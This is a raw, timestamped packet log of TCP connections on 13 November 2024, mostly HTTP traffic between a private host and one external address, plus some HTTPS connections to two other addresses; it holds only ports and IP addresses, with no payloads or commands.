Nov 13, 2024 20:39:47.195858955 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.195864916 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.195898056 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.195925951 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.224562883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.224576950 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.224586964 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.224601030 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.224613905 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.224638939 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.224693060 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.224847078 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.227142096 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.267664909 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.267677069 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.267687082 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.267699003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.267740965 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.267780066 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.294945002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.294956923 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.294967890 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.294981003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.294991970 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.295021057 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.295063972 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.295648098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.295660973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.295671940 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.295681000 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.295718908 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.312454939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.312468052 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.312474966 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.312480927 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.312486887 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.312493086 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.312593937 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.312838078 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.312849998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.312863111 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.312875032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.312891960 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.312908888 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.319479942 CET	443	49914	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.341675043 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.341705084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.341717005 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.341723919 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.341737032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.341748953 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.341783047 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.341835022 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.372416973 CET	49914	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.376682043 CET	49914	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.376698017 CET	443	49914	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.377235889 CET	49914	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.377245903 CET	443	49914	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.386677980 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.386693001 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.386704922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.386717081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.386761904 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.386802912 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.412331104 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.412348032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.412358999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.412369967 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.412384033 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.412395000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.412419081 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.412419081 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.412507057 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.413316011 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.413327932 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.413340092 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.413363934 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.413399935 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.429582119 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.429604053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.429615021 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.429677010 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.429711103 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.429804087 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.429816008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.429827929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.429975986 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.429975986 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.430408001 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.430421114 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.430434942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.430448055 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.430485010 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.430525064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.430828094 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.430838108 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.430880070 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.458640099 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.458658934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.458669901 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.458681107 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.458693981 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.458704948 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.458786011 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.458786964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.458786964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.502667904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.502686024 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.502696991 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.502851963 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.502851963 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.503813028 CET	443	49914	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.504333973 CET	443	49914	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.504442930 CET	49914	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.504548073 CET	49914	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.504549026 CET	49914	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.504611969 CET	443	49914	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.504642963 CET	443	49914	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.508069038 CET	49918	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.508107901 CET	443	49918	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.508174896 CET	49918	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.508567095 CET	49918	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.508582115 CET	443	49918	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.509999990 CET	443	49915	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.510451078 CET	49915	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.510473013 CET	443	49915	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.510920048 CET	49915	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.510929108 CET	443	49915	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.529448986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.529467106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.529479027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.529491901 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.529541016 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.529616117 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.529702902 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.529716015 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.529728889 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.529742002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.529761076 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.529791117 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.529815912 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.548702002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.548717976 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.548731089 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.548743010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.548754930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.548767090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.548772097 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.548801899 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.548813105 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.549009085 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.549050093 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.549102068 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.549113989 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.549125910 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.549149036 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.549173117 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.560988903 CET	443	49916	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.563581944 CET	49916	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.563612938 CET	443	49916	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.564184904 CET	49916	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.564192057 CET	443	49916	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.575824022 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.575849056 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.575864077 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.575875998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.575887918 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.575897932 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.575910091 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.575922012 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.575917006 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.575917006 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.576008081 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.576008081 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.597242117 CET	443	49917	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.601730108 CET	49917	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.601780891 CET	443	49917	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.602540970 CET	49917	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.602547884 CET	443	49917	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.619395971 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.619409084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.619419098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.619609118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.619609118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.638860941 CET	443	49915	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.639033079 CET	443	49915	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.639132977 CET	49915	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.639369011 CET	49915	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.639404058 CET	443	49915	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.639556885 CET	49915	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.639574051 CET	443	49915	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.646552086 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.646565914 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.646575928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.646589041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.646600008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.646655083 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.646733046 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.646899939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.646912098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.646923065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.646934032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.646945000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.646959066 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.646995068 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.646995068 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.651741982 CET	49919	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.651782036 CET	443	49919	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.652131081 CET	49919	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.656002045 CET	49919	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.656022072 CET	443	49919	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.665637016 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.665656090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.665669918 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.665683985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.665735006 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.665735960 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.665870905 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.665884018 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.665894985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.665908098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.665944099 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.665944099 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.666333914 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.666347027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.666357994 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.666400909 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.666414976 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.689284086 CET	443	49916	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.689667940 CET	443	49916	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.689738035 CET	49916	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.693012953 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.693053007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.693064928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.693075895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.693089008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.693145990 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.693186998 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.693912983 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.693924904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.693934917 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.693948030 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.693990946 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.693991899 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.695787907 CET	49920	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.695832014 CET	443	49920	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:47.696064949 CET	49920	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.696381092 CET	49921	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.696413994 CET	443	49921	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:47.696472883 CET	49921	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.700381994 CET	49921	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.700398922 CET	443	49921	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:47.700737000 CET	49920	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.700762987 CET	443	49920	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:47.708846092 CET	49916	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.708846092 CET	49916	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.708884954 CET	443	49916	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.708914995 CET	443	49916	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.713900089 CET	49922	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.713934898 CET	443	49922	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.714003086 CET	49922	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.716278076 CET	49922	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.716291904 CET	443	49922	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.733093023 CET	443	49917	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.733464956 CET	443	49917	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.733514071 CET	443	49917	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.733582020 CET	49917	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.733634949 CET	49917	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.733634949 CET	49917	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.733652115 CET	443	49917	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.733663082 CET	443	49917	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.736179113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.736227989 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.736238956 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.736251116 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.736291885 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.736490965 CET	49923	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.736531973 CET	443	49923	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.736597061 CET	49923	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.736819983 CET	49923	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:47.736831903 CET	443	49923	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:47.763447046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.763468027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.763480902 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.763525009 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.763560057 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.763562918 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.763576984 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.763587952 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.763613939 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.763637066 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.764071941 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.764084101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.764094114 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.764146090 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.782636881 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.782653093 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.782664061 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.782675982 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.782705069 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.782754898 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.782922983 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.782936096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.782947063 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.782962084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.782972097 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.782975912 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.782996893 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.783014059 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.783746004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.783757925 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.783771038 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.783782959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.783799887 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.783837080 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.809988976 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.810009003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.810023069 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.810038090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.810064077 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.810112000 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.810293913 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.810307980 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.810322046 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.810332060 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.810337067 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.810352087 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.810355902 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.810384035 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.853563070 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.853588104 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.853602886 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.853657961 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.853698015 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.880629063 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.880661011 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.880675077 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.880688906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.880697966 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.880702972 CET	80	49873	185.215.113.206	192.168.2.5
